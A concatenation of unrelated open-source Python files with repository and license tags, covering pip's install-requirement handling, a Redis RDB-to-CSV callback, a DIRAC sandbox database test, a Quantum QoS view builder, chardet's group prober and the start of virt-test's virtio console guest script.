if self.source_dir and os.path.exists(
os.path.join(self.source_dir, PIP_DELETE_MARKER_FILENAME)):
logger.debug('Removing source in %s', self.source_dir)
rmtree(self.source_dir)
self.source_dir = None
self._temp_build_dir.cleanup()
self.build_env.cleanup()
def check_if_exists(self, use_user_site):
"""Find an installed distribution that satisfies or conflicts
with this requirement, and set self.satisfied_by or
self.conflicts_with appropriately.
"""
if self.req is None:
return False
try:
# get_distribution() will resolve the entire list of requirements
# anyway, and we've already determined that we need the requirement
# in question, so strip the marker so that we don't try to
# evaluate it.
no_marker = Requirement(str(self.req))
no_marker.marker = None
self.satisfied_by = pkg_resources.get_distribution(str(no_marker))
if self.editable and self.satisfied_by:
self.conflicts_with = self.satisfied_by
# when installing editables, nothing pre-existing should ever
# satisfy
self.satisfied_by = None
return True
except pkg_resources.DistributionNotFound:
return False
except pkg_resources.VersionConflict:
existing_dist = pkg_resources.get_distribution(
self.req.name
)
if use_user_site:
if dist_in_usersite(existing_dist):
self.conflicts_with = existing_dist
elif (running_under_virtualenv() and
dist_in_site_packages(existing_dist)):
raise InstallationError(
"Will not install to the user site because it will "
"lack sys.path precedence to %s in %s" %
(existing_dist.project_name, existing_dist.location)
)
else:
self.conflicts_with = existing_dist
return True
# Things valid for wheels
@property
def is_wheel(self):
return self.link and self.link.is_wheel
def move_wheel_files(self, wheeldir, root=None, home=None, prefix=None,
warn_script_location=True, use_user_site=False,
pycompile=True):
move_wheel_files(
self.name, self.req, wheeldir,
user=use_user_site,
home=home,
root=root,
prefix=prefix,
pycompile=pycompile,
isolated=self.isolated,
warn_script_location=warn_script_location,
)
# Things valid for sdists
@property
def setup_py_dir(self):
return os.path.join(
self.source_dir,
self.link and self.link.subdirectory_fragment or '')
@property
def setup_py(self):
assert self.source_dir, "No source dir for %s" % self
setup_py = os.path.join(self.setup_py_dir, 'setup.py')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(setup_py, six.text_type):
setup_py = setup_py.encode(sys.getfilesystemencoding())
return setup_py
@property
def pyproject_toml(self):
assert self.source_dir, "No source dir for %s" % self
pp_toml = os.path.join(self.setup_py_dir, 'pyproject.toml')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(pp_toml, six.text_type):
pp_toml = pp_toml.encode(sys.getfilesystemencoding())
return pp_toml
def get_pep_518_info(self):
"""Get PEP 518 build-time requirements.
Returns the list of the packages required to build the project,
specified as per PEP 518 within the package. If `pyproject.toml` is not
present, returns None to signify not using the same.
"""
# If pyproject.toml does not exist, don't do anything.
if not os.path.isfile(self.pyproject_toml):
return None
error_template = (
"{package} has a pyproject.toml file that does not comply "
"with PEP 518: {reason}"
)
with io.open(self.pyproject_toml, encoding="utf-8") as f:
pp_toml = pytoml.load(f)
# If there is no build-system table, just use setuptools and wheel.
if "build-system" not in pp_toml:
return ["setuptools", "wheel"]
# Specifying the build-system table but not the requires key is invalid
build_system = pp_toml["build-system"]
if "requires" not in build_system:
raise InstallationError(
error_template.format(package=self, reason=(
"it has a 'build-system' table but not "
"'build-system.requires' which is mandatory in the table"
))
)
# Error out if it's not a list of strings
requires = build_system["requires"]
if not _is_list_of_str(requires):
raise InstallationError(error_template.format(
package=self,
reason="'build-system.requires' is not a list of strings.",
))
return requires
def run_egg_info(self):
assert self.source_dir
if self.name:
logger.debug(
'Running setup.py (path:%s) egg_info for package %s',
self.setup_py, self.name,
)
else:
logger.debug(
'Running setup.py (path:%s) egg_info for package from %s',
self.setup_py, self.link,
)
with indent_log():
script = SETUPTOOLS_SHIM % self.setup_py
base_cmd = [sys.executable, '-c', script]
if self.isolated:
base_cmd += ["--no-user-cfg"]
egg_info_cmd = base_cmd + ['egg_info']
# We can't put the .egg-info files at the root, because then the
# source code will be mistaken for an installed egg, causing
# problems
if self.editable:
egg_base_option = []
else:
egg_info_dir = os.path.join(self.setup_py_dir, 'pip-egg-info')
ensure_dir(egg_info_dir)
egg_base_option = ['--egg-base', 'pip-egg-info']
with self.build_env:
call_subprocess(
egg_info_cmd + egg_base_option,
cwd=self.setup_py_dir,
show_stdout=False,
command_desc='python setup.py egg_info')
if not self.req:
if isinstance(parse_version(self.pkg_info()["Version"]), Version):
op = "=="
else:
op = "==="
self.req = Requirement(
"".join([
self.pkg_info()["Name"],
op,
self.pkg_info()["Version"],
])
)
self._correct_build_location()
else:
metadata_name = canonicalize_name(self.pkg_info()["Name"])
if canonicalize_name(self.req.name) != metadata_name:
logger.warning(
'Running setup.py (path:%s) egg_info for package %s '
'produced metadata for project name %s. Fix your '
'#egg=%s fragments.',
self.setup_py, self.name, metadata_name, self.name
)
self.req = Requirement(metadata_name)
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
data = read_text_file(filename)
return data
def egg_info_path(self, filename):
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.setup_py_dir, 'pip-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = []
for root, dirs, files in os.walk(base):
for dir in vcs.dirnames:
if dir in dirs:
dirs.remove(dir)
# Iterate over a copy of ``dirs``, since mutating
# a list while iterating over it can cause trouble.
# (See https://github.com/pypa/pip/pull/462.)
for dir in list(dirs):
# Don't search in anything that looks like a virtualenv
# environment
if (
os.path.lexists(
os.path.join(root, dir, 'bin', 'python')
) or
os.path.exists(
os.path.join(
root, dir, 'Scripts', 'Python.exe'
)
)):
dirs.remove(dir)
# Also don't search through tests
elif dir == 'test' or dir == 'tests':
dirs.remove(dir)
filenames.extend([os.path.join(root, dir)
for dir in dirs])
filenames = [f for f in filenames if f.endswith('.egg-info')]
if not filenames:
raise InstallationError(
"Files/directories (from %s) not found in %s"
% (filename, base)
)
# if we have more than one match, we pick the toplevel one. This
# can easily be the case if there is a dist folder which contains
# an extracted tarball for testing purposes.
if len(filenames) > 1:
filenames.sort(
key=lambda x: x.count(os.path.sep) +
(os.path.altsep and x.count(os.path.altsep) or 0)
)
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def pkg_info(self):
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warning(
'No PKG-INFO file found in %s',
display_path(self.egg_info_path('PKG-INFO')),
)
p.feed(data or '')
return p.close()
_requirements_section_re = re.compile(r'\[(.*?)\]')
def get_dist(self):
"""Return a pkg_resources.Distribution built from self.egg_info_path"""
egg_info = self.egg_info_path('').rstrip(os.path.sep)
base_dir = os.path.dirname(egg_info)
metadata = pkg_resources.PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
return pkg_resources.Distribution(
os.path.dirname(egg_info),
project_name=dist_name,
metadata=metadata,
)
def assert_source_matches_version(self):
assert self.source_dir
version = self.pkg_info()['version']
if self.req.specifier and version not in self.req.specifier:
logger.warning(
'Requested %s, but installing version %s',
self,
version,
)
else:
logger.debug(
'Source in %s has version %s, which satisfies requirement %s',
display_path(self.source_dir),
version,
self,
)
# For both source distributions and editables
def ensure_has_source_dir(self, parent_dir):
"""Ensure that a source_dir is set.
This will create a temporary build dir if the name of the requirement
isn't known yet.
:param parent_dir: The ideal pip parent_dir for the source_dir.
Generally src_dir for editables and build_dir for sdists.
:return: self.source_dir
"""
if self.source_dir is None:
self.source_dir = self.build_location(parent_dir)
return self.source_dir
# For editable installations
def install_editable(self, install_options,
global_options=(), prefix=None):
logger.info('Running setup.py develop for %s', self.name)
if self.isolated:
global_options = list(global_options) + ["--no-user-cfg"]
if prefix:
prefix_param = ['--prefix={}'.format(prefix)]
install_options = list(install_options) + prefix_param
with indent_log():
# FIXME: should we do --install-headers here too?
with self.build_env:
call_subprocess(
[
sys.executable,
'-c',
SETUPTOOLS_SHIM % self.setup_py
] +
list(global_options) +
['develop', '--no-deps'] +
list(install_options),
cwd=self.setup_py_dir,
show_stdout=False,
)
self.install_succeeded = True
def update_editable(self, obtain=True):
if not self.link:
logger.debug(
"Cannot update repository at %s; repository location is "
"unknown",
self.source_dir,
)
return
assert self.editable
assert self.source_dir
if self.link.scheme == 'file':
# Static paths don't get updated
return
assert '+' in self.link.url, "bad url: %r" % self.link.url
if not self.update:
return
vc_type, url = self.link.url.split('+', 1)
backend = vcs.get_backend(vc_type)
if backend:
vcs_backend = backend(self.link.url)
if obtain:
vcs_backend.obtain(self.source_dir)
else:
vcs_backend.export(self.source_dir)
else:
assert 0, (
'Unexpected version control type (in %s): %s'
% (self.link, vc_type))
# Top-level Actions
def uninstall(self, auto_confirm=False, verbose=False,
use_user_site=False):
"""
Uninstall the distribution currently satisfying this requirement.
Prompts before removing or modifying files unless
``auto_confirm`` is True.
Refuses to delete or modify files outside of ``sys.prefix`` -
thus uninstallation within a virtual environment can only
modify that virtual environment, even if the virtualenv is
linked to global site-packages.
"""
if not self.check_if_exists(use_user_site):
logger.warning("Skipping %s as it is not installed.", self.name)
return
dist = self.satisfied_by or self.conflicts_with
uninstalled_pathset = UninstallPathSet.from_dist(dist)
uninstalled_pathset.remove(auto_confirm, verbose)
return uninstalled_pathset
def _clean_zip_name(self, name, prefix): # only used by archive.
assert name.startswith(prefix + os.path.sep), (
"name %r doesn't start with prefix %r" % (name, prefix)
)
name = name[len(prefix) + 1:]
name = name.replace(os.path.sep, '/')
return name
# TODO: Investigate if this should be kept in InstallRequirement
# Seems to be used only when VCS + downloads
def archive(self, build_dir):
assert self.source_dir
create_archive = True
archive_name = '%s-%s.zip' % (self.name, self.pkg_info()["version"])
archive_path = os.path.join(build_dir, archive_name)
if os.path.exists(archive_path):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup, (a)bort ' %
display_path(archive_path), ('i', 'w', 'b', 'a'))
if response == 'i':
create_archive = False
elif response == 'w':
logger.warning('Deleting %s', display_path(archive_path))
os.remove(archive_path)
elif response == 'b':
dest_file = backup_dir(archive_path)
logger.warning(
'Backing up %s to %s',
display_path(archive_path),
display_path(dest_file),
)
shutil.move(archive_path, dest_file)
elif response == 'a':
sys.exit(-1)
if create_archive:
zip = zipfile.ZipFile(
archive_path, 'w', zipfile.ZIP_DEFLATED,
allowZip64=True
)
dir = os.path.normcase(os.path.abspath(self.setup_py_dir))
for dirpath, dirnames, filenames in os.walk(dir):
if 'pip-egg-info' in dirnames:
dirnames.remove('pip-egg-info')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
zipdir.external_attr = 0x1ED << 16 # 0o755
zip.writestr(zipdir, '')
for filename in filenames:
if filename == PIP_DELETE_MARKER_FILENAME:
continue
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, self.name + '/' + name)
zip.close()
logger.info('Saved %s', display_path(archive_path))
def install(self, install_options, global_options=None, root=None,
home=None, prefix=None, warn_script_location=True,
use_user_site=False, pycompile=True):
global_options = global_options if global_options is not None else []
if self.editable:
self.install_editable(
install_options, global_options, prefix=prefix,
)
return
if self.is_wheel:
version = wheel.wheel_version(self.source_dir)
wheel.check_compatibility(version, self.name)
self.move_wheel_files(
self.source_dir, root=root, prefix=prefix, home=home,
warn_script_location=warn_script_location,
use_user_site=use_user_site, pycompile=pycompile,
)
self.install_succeeded = True
return
# Extend the list of global and install options passed on to
# the setup.py call with the ones from the requirements file.
# Options specified in requirements file override those
# specified on the command line, since the last option given
# to setup.py is the one that is used.
global_options = list(global_options) + \
self.options.get('global_options', [])
install_options = list(install_options) + \
self.options.get('install_options', [])
if self.isolated:
global_options = global_options + ["--no-user-cfg"]
with TempDirectory(kind="record") as temp_dir:
record_filename = os.path.join(temp_dir.path, 'install-record.txt')
install_args = self.get_install_args(
global_options, record_filename, root, prefix, pycompile,
)
msg = 'Running setup.py install for %s' % (self.name,)
with open_spinner(msg) as spinner:
with indent_log():
with self.build_env:
call_subprocess(
install_args + install_options,
cwd=self.setup_py_dir,
show_stdout=False,
spinner=spinner,
)
if not os.path.exists(record_filename):
logger.debug('Record file %s not found', record_filename)
return
self.install_succeeded = True
def prepend_root(path):
if root is None or not os.path.isabs(path):
return path
else:
return change_root(root, path)
with open(record_filename) as f:
for line in f:
directory = os.path.dirname(line)
if directory.endswith('.egg-info'):
egg_info_dir = prepend_root(directory)
break
else:
logger.warning(
'Could not find .egg-info directory in install record'
' for %s',
self,
)
# FIXME: put the record somewhere
# FIXME: should this be an error?
return
new_lines = []
with open(record_filename) as f:
for line in f:
filename = line.strip()
if os.path.isdir(filename):
filename += os.path.sep
new_lines.append(
os.path.relpath(prepend_root(filename), egg_info_dir)
)
new_lines.sort()
ensure_dir(egg_info_dir)
inst_files_path = os.path.join(egg_info_dir, 'installed-files.txt')
with open(inst_files_path, 'w') as f:
f.write('\n'.join(new_lines) + '\n')
def get_install_args(self, global_options, record_filename, root, prefix,
pycompile):
install_args = [sys.executable, "-u"]
install_args.append('-c')
install_args.append(SETUPTOOLS_SHIM % self.setup_py)
install_args += list(global_options) + \
['install', '--record', record_filename]
install_args += ['--single-version-externally-managed']
if root is not None:
install_args += ['--root', root]
if prefix is not None:
install_args += ['--prefix', prefix]
if pycompile:
install_args += ["--compile"]
else:
install_args += ["--no-compile"]
if running_under_virtualenv():
py_ver_str = 'python' + sysconfig.get_python_version()
install_args += ['--install-headers',
os.path.join(sys.prefix, 'include', 'site',
py_ver_str, self.name)]
return install_args
def parse_editable(editable_req):
"""Parses an editable requirement into:
- a requirement name
- an URL
- extras
- editable options
Accepted requirements:
svn+http://blahblah@rev#egg=Foobar[baz]&subdirectory=version_subdir
.[some_extra]
"""
from pip._internal.index import Link
url = editable_req
# If a file path is specified with extras, strip off the extras.
url_no_extras, extras = _strip_extras(url)
if os.path.isdir(url_no_extras):
if not os.path.exists(os.path.join(url_no_extras, 'setup.py')):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' not found." %
url_no_extras
)
# Treating it as code that has already been checked out
url_no_extras = path_to_url(url_no_extras)
if url_no_extras.lower().startswith('file:'):
package_name = Link(url_no_extras).egg_fragment
if extras:
return (
package_name,
url_no_extras,
Requirement("placeholder" + extras.lower()).extras,
)
else:
return package_name, url_no_extras, None
for version_control in vcs:
if url.lower().startswith('%s:' % version_control):
url = '%s+%s' % (version_control, url)
break
if '+' not in url:
raise InstallationError(
'%s should either be a path to a local project or a VCS url '
'beginning with svn+, git+, hg+, or bzr+' %
editable_req
)
vc_type = url.split('+', 1)[0].lower()
if not vcs.get_backend(vc_type):
error_message = 'For --editable=%s only ' % editable_req + \
', '.join([backend.name + '+URL' for backend in vcs.backends]) + \
' is currently supported'
raise InstallationError(error_message)
package_name = Link(url).egg_fragment
if not package_name:
raise InstallationError(
"Could not detect requirement name for '%s', please specify one "
"with #egg=your_package_name" % editable_req
)
return package_name, url, None
def deduce_helpful_msg(req):
"""Returns helpful msg in case requirements file does not exist,
or cannot be parsed.
:params req: Requirements file path
"""
msg = ""
if os.path.exists(req):
msg = " It does exist."
# Try to parse and check if it is a requirements file.
try:
with open(req, 'r') as fp:
# parse first line only
next(parse_requirements(fp.read()))
msg += " The argument you provided " + \
"(%s) appears to be a" % (req) + \
" requirements file. If that is the" + \
" case, use the '-r' flag to install" + \
" the packages specified within it."
except RequirementParseError:
logger.debug("Cannot parse '%s' as requirements \
file" % (req), exc_info=1)
else:
msg += " File '%s' does not exist." % (req)
return msg
def _is_list_of_str(obj):
return (
isinstance(obj, list) and
all(isinstance(item, six.string_types) for item in obj)
)
| apache-2.0 |
meou/rdb2csv | rdb2csv/csv_callback.py | 1 | 2955 | #!/usr/bin/env python
import sys
from rdbtools import RdbCallback
class CsvCallback(RdbCallback):
def __init__(self, outf, pre, post, column_delimiter = ',', line_delimiter = '\n'):
self.outf = outf
self.column_delimiter = column_delimiter
self.line_delimiter = line_delimiter
self.pre_keys = tuple(pre)
self.post_keys = tuple(post)
self.pre_values = {}
self.post_values = {}
def set(self, key, value, expiry, info):
self.outf.write ("%s%s%s%s" % (str(key), self.column_delimiter, str(value), self.line_delimiter))
def start_hash(self, key, length, expiry, info):
s_key = str(key)
self.pre_values[s_key] = {}
self.post_values[s_key] = {}
def hset(self, key, field, value):
s_key = str(key)
s_field = str(field)
s_value = str(value)
if s_field in self.pre_keys:
self.pre_values[s_key][s_field] = s_value
# print (self.post_values)
elif s_field in self.post_keys:
self.post_values[s_key][s_field] = s_value
# print (self.post_values)
else:
print ("Ignore [key,field,value]=[%s, %s, %s]\n" % (s_key, s_field, s_value))
def end_hash(self, key):
s_key = str(key)
out_list = []
for pre_key in self.pre_keys:
if pre_key in self.pre_values[s_key]:
out_list.append(self.pre_values[s_key][pre_key])
out_list.append(self.column_delimiter)
out_list.append(key)
out_list.append(self.column_delimiter)
for post_key in self.post_keys:
if post_key in self.post_values[s_key]:
out_list.append(self.post_values[s_key][post_key])
out_list.append(self.column_delimiter)
out_list.pop()
out_list.append(self.line_delimiter)
self.outf.write("".join(out_list))
del self.pre_values[s_key]
del self.post_values[s_key]
def start_set(self, key, cardinality, expiry, info):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def sadd(self, key, member):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def end_set(self, key):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def start_list(self, key, length, expiry, info):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def rpush(self, key, value):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def end_list(self, key):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def start_sorted_set(self, key, length, expiry, info):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def zadd(self, key, score, member):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
def end_sorted_set(self, key):
self.outf.write (sys._getframe().f_code.co_name + " has not been unsupported yet\n")
| mit |
avedaee/DIRAC | WorkloadManagementSystem/DB/test/TestSandboxDB.py | 1 | 1326 | import unittest,zlib
from DIRAC.WorkloadManagementSystem.DB.SandboxDB import SandboxDB
class JobDBTestCase(unittest.TestCase):
""" Base class for the SandboxDB test cases
"""
def setUp(self):
print
self.sDB = SandboxDB('Test',20)
class SandboxCase(JobDBTestCase):
""" TestJobDB represents a test suite for the JobDB database front-end
"""
def test_uploadFile(self):
sandbox = 'out'
#testfile = open('test.jdl','r')
testfile = open('/home/atsareg/distributive/skype-1.3.0.53-1mdk.i586.rpm','r')
body = testfile.read()
#body = zlib.compress(body)
testfile.close()
result = self.sDB.storeSandboxFile(1,sandbox+'putFile1',body,sandbox)
print result
self.assert_( result['OK'])
result = self.sDB.getSandboxFile(1,sandbox+'putFile1',sandbox)
self.assert_( result['OK'])
newbody = result['Value']
self.assertEqual(body,newbody)
result = self.sDB.getFileNames(1,sandbox)
self.assert_( result['OK'])
print result
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(SandboxCase)
# suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(JobRemovalCase))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
| gpl-3.0 |
aristanetworks/arista-ovs-quantum | quantum/extensions/_qos_view.py | 12 | 1772 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2011 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Ying Liu, Cisco Systems, Inc.
#
def get_view_builder(req):
"""get view builder"""
base_url = req.application_url
return ViewBuilder(base_url)
class ViewBuilder(object):
"""
ViewBuilder for QoS,
derived from quantum.views.networks
"""
def __init__(self, base_url):
"""
:param base_url: url of the root wsgi application
"""
self.base_url = base_url
def build(self, qos_data, is_detail=False):
"""Generic method used to generate a QoS entity."""
if is_detail:
qos = self._build_detail(qos_data)
else:
qos = self._build_simple(qos_data)
return qos
def _build_simple(self, qos_data):
"""Return a simple description of qos."""
return dict(qos=dict(id=qos_data['qos_id']))
def _build_detail(self, qos_data):
"""Return a detailed description of qos."""
return dict(qos=dict(id=qos_data['qos_id'],
name=qos_data['qos_name'],
description=qos_data['qos_desc']))
| apache-2.0 |
mmazanec22/too-windy | env/lib/python3.5/site-packages/requests/packages/chardet/charsetgroupprober.py | 2929 | 3791 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from . import constants
import sys
from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mActiveNum = 0
self._mProbers = []
self._mBestGuessProber = None
def reset(self):
CharSetProber.reset(self)
self._mActiveNum = 0
for prober in self._mProbers:
if prober:
prober.reset()
prober.active = True
self._mActiveNum += 1
self._mBestGuessProber = None
def get_charset_name(self):
if not self._mBestGuessProber:
self.get_confidence()
if not self._mBestGuessProber:
return None
# self._mBestGuessProber = self._mProbers[0]
return self._mBestGuessProber.get_charset_name()
def feed(self, aBuf):
for prober in self._mProbers:
if not prober:
continue
if not prober.active:
continue
st = prober.feed(aBuf)
if not st:
continue
if st == constants.eFoundIt:
self._mBestGuessProber = prober
return self.get_state()
elif st == constants.eNotMe:
prober.active = False
self._mActiveNum -= 1
if self._mActiveNum <= 0:
self._mState = constants.eNotMe
return self.get_state()
return self.get_state()
def get_confidence(self):
st = self.get_state()
if st == constants.eFoundIt:
return 0.99
elif st == constants.eNotMe:
return 0.01
bestConf = 0.0
self._mBestGuessProber = None
for prober in self._mProbers:
if not prober:
continue
if not prober.active:
if constants._debug:
sys.stderr.write(prober.get_charset_name()
+ ' not active\n')
continue
cf = prober.get_confidence()
if constants._debug:
sys.stderr.write('%s confidence = %s\n' %
(prober.get_charset_name(), cf))
if bestConf < cf:
bestConf = cf
self._mBestGuessProber = prober
if not self._mBestGuessProber:
return 0.0
return bestConf
# else:
# self._mBestGuessProber = self._mProbers[0]
# return self._mBestGuessProber.get_confidence()
| gpl-3.0 |
xutian/virt-test | shared/scripts/virtio_console_guest.py | 9 | 50746 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Auxiliary script used to send data between ports on guests.
:copyright: 2010 Red Hat, Inc.
:author: Jiri Zupka ([email protected])
:author: Lukas Doktor ([email protected])
"""
import threading
from threading import Thread
import os
import select
import re
import random
import sys
import array
import stat
import traceback
import signal
import time
if os.name == "posix": # Linux
os_linux = True
import fcntl
else: # Windows
os_linux = False
try:
import win32file
except ImportError, failure_detail:
print "Import failed. Do you have ctypes and pywin32 installed?"
raise failure_detail
DEBUGPATH = "/sys/kernel/debug"
SYSFSPATH = "/sys/class/virtio-ports/"
DEVPATH = "/dev/virtio-ports/"
exiting = False
virt = None
class VirtioGuest:
"""
Test tools of virtio_ports.
"""
LOOP_NONE = 0
LOOP_POLL = 1
LOOP_SELECT = 2
LOOP_RECONNECT_NONE = 3
def __init__(self):
self.files = {}
self.exit_thread = threading.Event()
self.threads = []
self.ports = {}
self.poll_fds = {}
self.catch_signal = None
self.use_config = threading.Event()
def init(self, in_files):
"""
Init and check port properties.
"""
raise NotImplementedError
def _open(self, in_files):
"""
Open devices and return array of descriptors
:param in_files: Files array
:return: Array of descriptor
"""
raise NotImplementedError
def check_zero_sym(self):
"""
Check if port the first port symlinks were created.
"""
raise NotImplementedError
def poll(self, port, expected, timeout=500):
"""
Checks the port POLL status and verify with expected results.
:param port: Port name.
:param expected: Expected POLL status (mask)
"""
raise NotImplementedError
def lseek(self, port, pos, how):
"""
Use lseek on the device. The device is unseekable so PASS is returned
when lseek command fails and vice versa.
:param port: Name of the port
:param pos: Offset
:param how: Relative offset os.SEEK_{SET,CUR,END}
"""
raise NotImplementedError
def blocking(self, port, mode=False):
"""
Set port function mode blocking/nonblocking
:param port: port to set mode
:param mode: False to set nonblock mode, True for block mode
"""
raise NotImplementedError
def async(self, port, mode=True, exp_val=0):
"""
Set port function mode async/sync.
:param port: port which should be pooled.
:param mode: False to set sync mode, True for sync mode.
:param exp_val: Value which should be pooled.
"""
raise NotImplementedError
def close(self, port_file):
"""
Close open port.
:param port_file: File to close.
"""
raise NotImplementedError
def open(self, in_file):
"""
Direct open devices.
:param in_file: Array of files.
:return: Array of descriptors.
"""
raise NotImplementedError
def loopback(self, in_files, out_files, cachesize=1024,
mode=0):
"""
Start a switch thread.
(There is a problem with multiple opens of a single file).
:param in_files: Array of input files.
:param out_files: Array of output files.
:param cachesize: Cachesize.
:param mode: Mode of switch.
"""
in_f = self._open(in_files)
out_f = self._open(out_files)
s = self.Switch(in_f, out_f, self.exit_thread, cachesize, mode)
s.start()
self.threads.append(s)
print "PASS: Start switch"
def exit_threads(self):
"""
Function end all running data switch.
"""
raise NotImplementedError
def send_loop_init(self, port, length):
"""
Prepares the sender thread. Requires clean thread structure.
:param port: On which port to sent data
:param length: length of data
"""
raise NotImplementedError
def send_loop(self):
"""
Start sender data transfer. Requires senderprepare run first.
"""
raise NotImplementedError
def send(self, port, length=1, mode=True, is_static=False):
"""
Send a data of arbitrary length
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
:param is_static: False = generates $length long block (mode=0)
True = generates 4096 long block (faster, mode=1)
"""
raise NotImplementedError
def recv(self, port, length=1, bfr=1024, mode=True):
"""
Receive a data of arbitrary length.
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
"""
raise NotImplementedError
def clean_port(self, port, bfr=1024):
raise NotImplementedError
class VirtioGuestPosix(VirtioGuest):
"""
Test tools of virtio_ports.
"""
def _readfile(self, name):
"""
Read file and return content as string
:param name: Name of file
:return: Content of file as string
"""
out = ""
try:
f = open(name, "r")
out = f.read()
f.close()
except Exception:
print "FAIL: Cannot open file %s" % (name)
return out
def _get_port_status(self, in_files=None):
"""
Get info about ports from kernel debugfs.
:param in_files: Array of input files.
:return: Ports dictionary of port properties
"""
ports = {}
not_present_msg = "FAIL: There's no virtio-ports dir in debugfs"
if not os.path.ismount(DEBUGPATH):
os.system('mount -t debugfs none %s' % (DEBUGPATH))
try:
if not os.path.isdir('%s/virtio-ports' % (DEBUGPATH)):
print not_present_msg
except Exception:
print not_present_msg
else:
viop_names = os.listdir('%s/virtio-ports' % (DEBUGPATH))
if in_files is not None:
dev_names = os.listdir('/dev')
rep = re.compile(r"vport[0-9]p[0-9]+")
dev_names = filter(
lambda x: rep.match(x) is not None, dev_names)
if len(dev_names) != len(in_files):
print ("FAIL: Not all ports were successfully initialized "
"in /dev, only %d from %d." % (len(dev_names),
len(in_files)))
return
if len(viop_names) != len(in_files):
print ("FAIL: Not all ports were successfully initialized "
"in debugfs, only %d from %d." % (len(viop_names),
len(in_files)))
return
for name in viop_names:
open_db_file = "%s/virtio-ports/%s" % (DEBUGPATH, name)
f = open(open_db_file, 'r')
port = {}
line_list = []
for line in iter(f):
line_list.append(line)
try:
for line in line_list:
m = re.match("(\S+): (\S+)", line)
port[m.group(1)] = m.group(2)
if port['is_console'] == "yes":
port["path"] = "/dev/hvc%s" % (port["console_vtermno"])
# Console works like a serialport
else:
port["path"] = "/dev/%s" % name
if not os.path.exists(port['path']):
print "FAIL: %s not exist" % port['path']
sysfspath = SYSFSPATH + name
if not os.path.isdir(sysfspath):
print "FAIL: %s not exist" % (sysfspath)
info_name = sysfspath + "/name"
port_name = self._readfile(info_name).strip()
if port_name != port["name"]:
print ("FAIL: Port info does not match "
"\n%s - %s\n%s - %s" %
(info_name, port_name,
"%s/virtio-ports/%s" % (DEBUGPATH, name),
port["name"]))
dev_ppath = DEVPATH + port_name
if not os.path.exists(dev_ppath):
print "FAIL: Symlink %s does not exist." % dev_ppath
if not os.path.realpath(dev_ppath) != "/dev/name":
print "FAIL: Symlink %s is not correct." % dev_ppath
except AttributeError:
print ("Bad data on file %s:\n%s. " %
(open_db_file, "".join(file).strip()))
print "FAIL: Bad data on file %s." % open_db_file
return
ports[port['name']] = port
f.close()
return ports
def check_zero_sym(self):
"""
Check if port /dev/vport0p0 was created.
"""
symlink = "/dev/vport0p0"
if os.path.exists(symlink):
print "PASS: Symlink %s exists." % symlink
else:
print "FAIL: Symlink %s does not exist." % symlink
def init(self, in_files):
"""
Init and check port properties.
"""
self.ports = self._get_port_status(in_files)
if self.ports is None:
return
for item in in_files:
if (item[1] != self.ports[item[0]]["is_console"]):
print self.ports
print "FAIL: Host console is not like console on guest side\n"
return
print "PASS: Init and check virtioconsole files in system."
class Switch(Thread):
"""
Thread that sends data between ports.
"""
def __init__(self, in_files, out_files, event,
cachesize=1024, method=0):
"""
:param in_files: Array of input files.
:param out_files: Array of output files.
